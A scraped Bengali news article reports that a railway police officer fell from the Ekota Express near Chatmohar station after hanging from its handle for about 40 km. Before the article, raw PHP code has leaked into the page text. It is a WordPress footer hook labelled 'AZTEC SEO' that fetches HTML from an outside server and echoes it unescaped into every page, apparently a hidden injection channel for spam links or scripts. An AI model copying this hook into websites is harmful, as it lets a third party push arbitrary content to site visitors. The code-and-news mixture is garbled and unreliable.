/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ট্রেন থেকে পড়ে অল্পের জন্য প্রাণে বাঁচলেন পুলিশ সদস্য | Dhaka Sky News

সুজানগরে ২৪৪৯ লিটার জ্বালানি তেল জব্দ

আগের সংবাদ

এবার কোন দেশ যুক্তরাষ্ট্রের টার্গেটে, জানালেন ট্রাম্প

পরের সংবাদ

ট্রেন থেকে পড়ে অল্পের জন্য প্রাণে বাঁচলেন পুলিশ সদস্য

print sharing buttonট্রেন থেকে পড়ে অল্পের জন্য প্রাণে বাঁচলেন পুলিশ সদস্য

ট্রেনের হ্যান্ডেলে ঝুলে প্রায় ৪০ কিলোমিটার আসার পর চাটমোহর স্টেশনে ট্রেনটি অতিক্রম করার সময় রেললাইনের উপর পড়ে যান পুলিশ সদস্য সোহেল রানা। ছবি: যুগান্তর

পাবনার চাটমোহরে ট্রেন থেকে পড়ে সোহেল রানা (৪০) নামে রেলওয়ে পুলিশের এক সদস্য প্রাণে বাঁচলেও গুরুতর আহত হয়েছেন। শনিবার (২৭ মার্চ) সকাল ৭টার দিকে চাটমোহর রেলওয়ে স্টেশনে এ ঘটনা ঘটে। পরে গুরুতর আহত অবস্থায় তাকে উদ্ধার করে উপজেলা স্বাস্থ্য কমপ্লেক্সে ভর্তি করা হয়।

আহত পুলিশ সদস্য দিনাজপুরের বিরল উপজেলার নেরাবাড়ী গ্রামের মৃত হাসান আলীর ছেলে।

ঘটনায় জানা গেছে, পঞ্চগড় থেকে ছেড়ে আসা ঢাকাগামী বিরতিহীন আন্তঃনগর একতা এক্সপ্রেস ট্রেনটি ক্রসিংজনিত কারণে মূলাডুলি স্টেশনে দাঁড়ায়।  প্রচুর ভিড় থাকায় ওই ট্রেনে কর্মরত সোহেল রানাসহ আরেক পুলিশ সদস্য এবং একজন টিটি স্টেশনে নেমে পায়চারী করছিলেন।  হঠাৎ সিগন্যাল পেয়ে ট্রেনটি ছেড়ে দিলে অন্য দুইজন কোনোমতে উঠতে পারলেও পুলিশ সদস্য সোহেল রানা ট্রেনে উঠতে পারেননি। পরে তিনি ট্রেনের হ্যান্ডেলে ঝুলে প্রায় ৪০ কিলোমিটার আসার পর চাটমোহর স্টেশনে ট্রেনটি অতিক্রম করার সময় রেললাইনের উপর পড়ে যান।

এতে মাথা, মুখমণ্ডল ও শরীরের বিভিন্ন জায়গায় গুরুতর আঘাত পান তিনি। পরে স্থানীয়রা তাকে উদ্ধার করে চাটমোহর উপজেলা স্বাস্থ্য কমপ্লেক্সে ভর্তি করেন।

একই সময়ে চাটমোহর স্টেশনে দাঁড়িয়ে থাকা মুসাব্বির হক রাসেল নামের এক যুবক ট্রেন যাওয়ার ভিডিও করার সময় ট্রেন থেকে পুলিশ সদস্যের পড়ে যাওয়ার দৃশ্যটি ক্যামেরায় ধরা পড়ে। তিনি ভিডিওটি ফেসবুকে পোস্ট দিতেই মুহূর্তেই ভাইরাল হয়ে পড়ে।

সত্যতা নিশ্চিত করে চাটমোহর রেলওয়ে স্টেশনের স্টেশনমাস্টার জহুরুল ইসলাম যুগান্তরকে বলেন, দীর্ঘসময় ট্রেনের হ্যান্ডেল ধরে ঝুলে আসার পর সোহেল রানা নামের ওই পুলিশ সদস্য আর নিজের ওপর নিয়ন্ত্রণ রাখতে পারেননি। চাটমোহর স্টেশন অতিক্রম করার সময় তিনি পড়ে যান।

চাটমোহর থানার ওসি গোলাম সারওয়ার হোসেন যুগান্তরকে জানান, ওই পুলিশ ট্রেনেই কর্মরত ছিলেন। ট্রেন থেকে পড়ে আহত হলে হাসপাতালে আনা হয়। পরে তাকে রেলওয়ে পুলিশ সদস্যরা এসে নিয়ে যান।